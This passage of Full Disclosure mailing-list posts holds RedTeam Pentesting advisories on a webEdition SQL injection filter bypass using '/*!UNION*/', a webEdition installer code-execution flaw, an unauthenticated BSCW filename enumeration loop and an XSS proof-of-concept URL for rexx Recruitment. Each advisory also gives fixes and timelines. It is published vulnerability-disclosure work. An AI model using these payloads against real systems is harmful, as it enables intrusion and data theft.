possible to use the UNION operator to obtain additional information, for example from other tables. As a security measure, webEdition implements filtering of the UNION keyword. The web application checks whether the text "UNION" is part of user-supplied information that is entered into database queries and then blocks such queries. This behaviour is implemented in the file /webEdition/we/include/we_classes/database/we_database_base.class.php using the function preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings) The CMS first checks whether the text "UNION" appears in the query string in any combination of upper- and lowercase characters. If that is the case, a regular expression is used to determine whether the word "UNION" appears in any context that is deemed dangerous by the application developers. However, the underlying MySQL database system supports embedding MySQL-specific query code within comments that contain an exclamation mark ("!") (see https://dev.mysql.com/doc/refman/5.5/en/comments.html). For example, a query like SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */ will yield no results on other database systems, but will return all rows on MySQL. Likewise, the text "/*!UNION*/", which is not caught by the aforementioned regular expression, can be used instead of just "UNION" on MySQL, thus enabling injections that use the UNION operator: $ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\ '&table=tblFile+WHERE+1=0+/*!UNION*/+SELECT+1,2,3,4,5,6/*&order=*/'
[FD] [RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script
r releases between 6.2.7 and 6.3.8. The newest, updated version would therefore be 6.3.8-s1. Note that the version check of webEdition might tell you that there is no update available and that you are running Version "6.3.8 (6.3.8.0 Release, SVN-Revision 6985). It will still tell you that the newest available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so you can use the "Update-Repetition" function to get the fix for this vulnerability. Also note that the update does not remove the OnlineInstaller, but modifies the login dialogue to remove the OnlineInstaller instead. You will need to open the login dialogue after installing the update to actually delete the OnlineInstaller. To be on the safe side, check the OnlineInstaller directory manually for any files that still need to be removed. Security Risk = Attackers can not only use the OnlineInstaller to destructively reinstall webEdition, but can also run arbitrary code PHP code by setting their own proxy server in the OnlineInstaller and inject content that is used as a parameter for the PHP eval() function. Since this attacker-supplied code is executed on the webEdition server with the privileges of the web server, this is a high risk, especially because the attack is not as easy to detect as a reinstallation of webEdition by an attacker. Timeline 2014-02-20 Vulnerability identified 2014-03-04 Customer approved disclosure to vendor 2014-03-06 CVE number requested and assigned 2014-03-07 Vendor notified 2014-03-10 Vendor acknowledges vulnerability 2014-05-20 Vendor announces fixed versions 2014-05-28 Advisory released References == http://www.webedition.org/de/aktuelles/webedition-cms/ Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht (German) http://www.webedition.org/de/aktuelles/webedition-cms/ Wichtige-Hinweise-zum-Sicherheitsupdate (German) RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW
Advisory: Metadata Information Disclosure in OrbiTeam BSCW RedTeam Pentesting discovered an information disclosure vulnerability in OrbiTeam's BSCW collaboration software. An unauthenticated attacker can disclose metadata about internal objects which are stored in BSCW. Details === Product: BSCW Affected Versions: BSCW <=5.0.7 Fixed Versions: BSCW >=5.0.8 Vulnerability Type: Information Disclosure Security Risk: medium Vendor URL: http://www.bscw.de/english/product.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003 Advisory Status: published CVE: CVE-2014-2301 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301 Introduction "The BSCW shared workspace system is the tool of choice for efficient group collaboration. BSCW permits the creation of documents, appointments, contacts, tasks and notes within shared workspaces. Without having to install additional software, team members can access this data around-the-clock, from anywhere in the world. Mission-critical information is constantly available to all authorised personnel regardless of location, ensuring that complex workflows can be coordinated with minimal effort." (from OrbiTeam's homepage) More Details BSCW uses the URL parameter "op" to select different functions of the application. For example the password reset dialog can be used by opening the following URL: https://www.example.com/pub/bscw.cgi/?op=chpwd The server maps the value provided by the parameter "op" to locally stored python modules which provide handler functions that are called to generate HTTP responses. It was discovered that sensitive metadata about internally stored objects of BSCW can be disclosed by using the "inf" operation. When opening the following URL, the filename of a document which is identified by the value "12345" is disclosed in the response sent by the server (output shortened): $ curl --header 'Cookie: _pub_bscws="e4efb9e7ace7a12de82aa7a4aff1ab2a:1"' \ "http://www.example.com/pub/bscw.cgi/12345?op=inf"; [...] Name Contract-X.doc [...] The cookie used in the above command is generated by requesting the login page of BSCW. It is not necessary to enter credentials. By iterating over the ids which are assigned in ascending order, attackers can enumerate the names of all objects stored in BSCW without prior authentication. This includes filenames and email addresses. Proof of Concept When the following loop is run with a valid (but unauthenticated) BSCW cookie, it will find names for the BSCW objects 1 to 3: $ for id in `seq 1 3`; do filename = `curl --silent --header 'Cookie: _pub_bscws="COOKIE_COOKIE_COOKIE"' \ "http://www.example.com/pub/bscw.cgi/${id}?op=inf"; | \ grep "iValueB" | \ sed -e 's;^.*\(.*\).*$;\1;'` echo "${id}: ${filename}" done Workaround == It may be possible to add another authentication layer, for example HTTP-Authentication, to limit access to this BSCW information disclosure to persons authorized to use BSCW anyway. Fix === Update to version 5.0.8. Security Risk = The risk is estimated to be medium. This vulnerability does not allow attackers to access files stored in BSCW. They can however retrieve filenames, which may be enough to draw conclusions about the corresponding file contents, and other potentially sensitive data such as email addresses. Timeline 2014-02-20 Vulnerability identified 2014-03-04 Customer approved disclosure to vendor 2014-03-06 CVE number requested and assigned 2014-03-07 Vendor notified 2014-03-10 Vendor acknowledges vulnerability 2014-04-22 Vendor released fixed version 2014-05-08 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature
[FD] [RT-SA-2014-002] rexx Recruitment: Cross-Site Scripting in User Registration
Advisory: rexx Recruitment Cross-Site Scripting in User Registration RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in rexx Recruitment's user registration page during a penetration test. If attackers can persuade users to click on a prepared link or redirected them to such a link from an attacker-controlled website, they are able to run arbitrary JavaScript code in the context of the rexx Recruitment installation's domain. Details === Product: rexx Recruitment Affected Versions: Releases prior to those fixed on 2014-01-15 Fixed Versions: R6.1 and R7 with fixes from 2014-01-15 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: http://www.rexx-systems.com Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-002 Advisory Status: published CVE: CVE-2014-1224 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1224 Introduction "rexx Recruitment supports around 3 million application processes each year (data from 2011). This stems from experience in applicant management: from company recruitment in small and medium-sized enterprises and international companies, through to specialised personnel service providers. The rexx Recruitment software supports paper, online and email applications. All information about and communication with the applicant at a glance in the digital applicant file!" (from rexx systems' homepage) More Details The rexx Recruitment software includes a user registration where job applicants who want to stay informed about new vacancies can register. The registration site is usually available at the path "/reg", for example at a URL like the following: http://www.example.com/reg The website asks for some mandatory data like name and surname as well as postal and email addresses. If a mandatory entry is missing when submitting the data, the website will present the registration site again to the user, with those input fields pre-populated with the data that was already filled in and error messages for the missing input fields. The pre-populated "first name" field with the name "redteam" would for example look as follows in the HTML source code: If it is now tried to embed control characters like an opening angle bracket in the name, the system filters the input by removing everything after the bracket. The value "red Proof of Concept The following URL adds a new "onfocus" event handler to the "fname" input field that gets executed as soon as the website is loaded due to the "autofocus" attribute: http://www.example.com/reg ?fname=redteam"%20onfocusonfocus%3d%3d"alert('RedTeam%20Pentesting')"%20autofocus%3d"autofocus &continue.x= &continue.y= Workaround == If possible, disable user registration and disallow access to the registration website, e.g. by blocking access in the web server. Fix === Update to versions R6.1 or R7 with the fixes from 2014-01-15 included. Security Risk = The risk of this vulnerability is estimated to be high. Being able to embed arbitrary JavaScript code allows attackers to completely manipulate the website, add their own content and track all user interaction. Timeline 2013-12-04 Vulnerability identified 2013-12-10 Customer approved disclosure to vendor 2013-12-13 Vendor notified 2014-01-15 Vendor released fixed version 2014-02-11 CVE number requested and assigned 2014-03-27 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/